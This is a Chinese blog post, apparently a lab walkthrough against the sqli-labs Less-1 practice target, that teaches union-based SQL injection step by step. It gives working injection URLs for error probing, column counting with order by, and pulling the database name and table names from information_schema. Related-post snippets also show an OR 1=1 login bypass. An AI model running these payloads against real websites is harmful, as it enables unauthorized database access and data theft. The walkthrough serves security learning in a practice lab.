网络学习-sql注入

最新推荐文章于 2023-08-10 15:13:14 发布
最新推荐文章于 2023-08-10 15:13:14 发布
阅读量8.8k 收藏 50
点赞数 12
分类专栏: 网络学习 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43547255/article/details/121511015
版权

网络学习-sql注入

一、检测注入点

在这里插入图片描述
在这里插入图片描述
请求中的参数为:查询字符串 id:1
在这里插入图片描述

二、判断是否存在 SQL 注入可能

SQL 语句未正确结束,因此返回了一个错误页面,如图所示:在这里插入图片描述

继续测试 and 1=1

http://10.40.105.2:28410/Less-1/?id=1' and 1=1 --+

SQL 语句用 and 连接可以设置多个条件,目前返回一个永久为真的条件,因此返回了一个正常页面,如图所示:
在这里插入图片描述
继续测试 and 1=1 和 and 1=2:
一个恒等式,一个恒不等式,输入 and 1=1 页面返回正常,而如果输入 and 1=2 时页面返回出错,说明 SQL 语句被执行,程序没有对敏感字符进行过滤
在这里插入图片描述

现在可以确定此处是一个 SQL 注入点,程序对带入的参数没有做任何处理,直接带到数据库的查询语句中。

三、数据库爆破

现在要判断数据库类型以及版本,构造语句如下:

http://10.40.105.2:28410/Less-1/?id=1' ord(mid(version(),1,1))>51 --+

发现返回正常页面,说明数据库是 MySQL,并且版本大于 4.0,支持 union 查询,反之是 4.0 以下版本或者其他类型数据库。
在这里插入图片描述

四、字段爆破

进一步猜测数据注入位置:

如果返回错误,说明字段小于 10:

http://10.40.105.2:28410/Less-1/?id=1' order by 10 --+

在这里插入图片描述如果返回错误,说明字段小于 4:
在这里插入图片描述如果返回错误,说明字段为 3:
在这里插入图片描述

五、数据库表爆破

在查询之前,我们先来了解一下sql注入中的union用法

sql注入联合查询中,我们会碰到union select 1,2,3。那这个是什么意思呢, union
select只能查询两个表中共同都有的字段,如果一个字段在另外一个表中没有,就会报错

select name from student union select teacher from zhigong

返回结果:就是两个表的并集

select直接加数字串时,可以不写后面的表名,那么它输出的内容就是我们select后的数字,这时我们写的一串数字就是一个数组(或1个行向量),这时select实际上没有向任何一个数据库查询数据,即查询命令不指向任何数据库的表。select 之后可以接一串数字:1,2,3…只是一个例子,可以看做给表中的列起了一个别名

在Union注入时,由于我们已经知道了前面语句的字段数

现在要构造联合查询语句 (union select),语句如下:(列数一定要对应)

http://10.40.105.2:28410/Less-1/?id=1 and 1=3 union select 1,2,3 --+

可以发现在页面中,原先的内容没有了,取而代之的是返回的数字 2,这个数字指的是我们可以把联合查询的对应位置替换为想要查询的关键字,比如版本,数据库名称,主要是用来探测 web 系统的信息。

在这里插入图片描述

六、用户名、密码爆破

可以把 3 替换掉,先查询数据库名称,构造语句如下:

http://10.40.105.2:28410/Less-1/?id=1' and 1=2 union select 1,2, database() --+

在这里插入图片描述浏览器返回了 security,说明这个网站的数据库名称是 security
用同样的手法查询表名,构造语句如下:

http://10.40.105.2:27027/Less-1/?id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema= 'security' --+

在这里插入图片描述查询所有的表

http://10.40.105.2:23911/Less-1/?id=1' and 1=2 union select 1,2,GROUP_CONCAT(table_name) from information_schema.tables where table_schema= 'security'--+

在这里插入图片描述

用表名是 emails
再用同样的手法猜测emails的字段,构造语句如下:
在这里插入图片描述字段名称存在id

可可鸭~
关注
  • 12
    点赞
  • 50
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
sql注入
wwwwyyyrre的博客
08-18 146
这里先推荐一篇大佬的博客 写的非常详细先来了解一下sql是什么。
sql注入问题
qq_33366098的博客
07-21 1032
SELECT * FROM USER WHERE NAME='' AND PASSWORD='xxx'; -- sql注入: 请尝试以下 用户名和密码. /* 用户名: 密码: xxx */ -- 将用户名和密码带入sql语句, 如下: SELECT * FROM USER WHERE NAME='xxx' OR 1=1 --' and password='xxx'; -- 发现sql语句...
解决SQL注入问题
qq_51328499的博客
11-28 1082
什么是SQL注入 当我们使用Statement进行操作时,在执行sql语句时,存在参数拼凑成恒等表达式的问题,如以下代码 public class TestStatement { public static void main(String[] args) { String url = "jdbc:oracle:thin:@192.168.200.128:1521:XE"; String username = "HR"; Stri...
SQL注入——通过注入得到已知用户名的密码
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
SQL WHERE 1=1
|||亩土也的专栏
03-14 1436
1=1或者a=a等等恒等式是T-SQL中表达true的方法。因为在T-SQL中没有true这样的关键字或值,所以需要借助这些恒等式来表达true的概念。相对的,同样可以使用1在应用程式的安全性方面,使用这些式子是SQL注入的基本原理,所以在拼接SQL语句的时候要过滤各种各样的敏感字符。当然,这些式子也有有用的地方。今天看到一个挺有用的小技巧:从一张表查询
asp源码-sql注入演示源码.zip
01-03
SQL注入是一种常见的网络安全威胁,发生在攻击者能够通过输入恶意SQL语句到应用程序的输入字段,从而控制或操纵后台数据库时。在ASP源码中,如果对用户输入的数据没有进行充分的验证和转义,就可能导致SQL注入漏洞。...
sqli-sql注入著名靶场
03-28
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能充分验证或清理用户输入的数据时,导致恶意SQL命令被执行。在本文中,我们将深入探讨SQL注入攻击、如何防范以及“sqli-sql注入著名靶场”这个资源在学习和...
SXU-网络攻防第六次作业-sql注入进阶
12-27
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过构造恶意的SQL语句来操纵数据库,获取敏感信息或控制数据库系统。本篇将详细讲解在“SXU-网络攻防第六次作业”中涉及的四种SQL注入类型:报错注入、时间注入、堆...
SQL注入天书 sqli-labs
01-11
学习SQL注入的过程中,你需要掌握以下关键知识点: 1. **SQL语法**:理解基本的SQL语句结构,包括SELECT、INSERT、UPDATE、DELETE等操作,以及WHERE、AND、OR等逻辑运算符,这有助于识别和构造注入语句。 2. **...
Mybatis解决多条件查询不能得到正确SQL的两种方法 恒等式 where标签
qq_44343213的博客
11-08 1085
Mybatis解决多条件查询不能得到正确SQL的两种方法 恒等式 where标签
SQL注入基础-易错问题汇总
weixin_30606461的博客
08-02 610
SQL注入基础-易错问题汇总 1.sql注入本质是什么 把用户输入当做代码执行 2.sql注入的条件 用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行 3.order by的作用及含义 order by 用于判断显示位,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段...
mysql知识点
花伤情犹在的博客
01-26 516
主键约束:primary key 外键约束:foreign key 非空约束:not null 唯一约束:unique 默认约束:default 检查约束:enum(‘男’,’女’) 数据类型:int float double char varchar enum year date datatime timestamp 建表语句: #create database student; use student; #创建学生表—xsb /* 学号(主键),姓名(非空),性别(枚举),年龄,班级(默认202),籍贯
前端的“SQL注入”,处理含有html标签的字符串
最新发布
cxk_ctrl的博客
08-10 274
处理含有HTML标签的字符串
SQL注入原理(预习作业)转载学习内容
qq_43473164的博客
03-17 550
Sql注入原理 程序员在web开发时,没有过滤敏感字符,绑定变量,导致攻击者可以通过sql灵活多变的语法,构造精心巧妙的语句,不择手段,达成目的,或者通过系统报错,返回对自己有用的信息。 Sql注入环境 需要用到的工具有:apache,mysql,php ,这几个组件可以单独下载安装,不过安装配置过程较为繁琐,还是建议新手直接从网上下载phpstudy ,一个绿色程序,包含上述三个组件,傻瓜化操作...
sql注入的实用应对措施
两天打鱼三天晒网
07-27 7045
关于sql注入大家可能或多或少有所了解,这篇文章介绍得很详细,大家可以看下: https://www.cnblogs.com/baizhanshi/p/6002898.html   总结了下最主要的原理就是利用sql语句中的注释漏洞-- sql = "select * from user_table where username='" &amp; userName &amp; "' an...
小试牛刀:SQL 注入攻击
热门推荐
carol980206的博客
02-24 6万+
小试牛刀:SQL注入攻击一、检测注入点二、判断是否存在 SQL 注入可能三、数据库爆破四、字段爆破五、数据库表爆破六、用户名、密码爆破七、总结 一、检测注入点 首先,在 http://120.203.13.75:6815/?id=1 目标站点页面发现了 ?id,说明可以通过查询 id=1 的内容来获得页面。 这相当于查询语句: select * from [表名] where id = '1'; ...
JDBC中的SQL注入
DZH2020的博客
08-14 1113
JDBC中的SQL注入
小白的SQL注入攻击入门
es0202的博客
05-13 1306
SQL注入攻击示意图:最开始是想找个有漏洞的网站进行SQL攻击,网上了解到inurl:TeachView.asp是一个有漏洞的网址,而且我搜索的时候确实还有很多网站包含了这个漏洞,但是可能应为众所周知的问题,我试着进入了几个网站,有好几个都提示了禁止访问。下面这个网站用了恒等式or 1=1可以访问:(看url) 并且猜测到了字段名和数据库名为:users和admin 但是下面这个网站就禁
网络安全技术13SQL注入.pptx
11-12
"网络安全技术13SQL注入.pptx" ...通过学习这部分内容,读者可以深入了解SQL注入的威胁,提高对网络安全的意识,并掌握防范此类攻击的方法,从而在实际工作中更好地保护Web应用程序和数据库的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

可可鸭~

想吃糖~我会甜

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值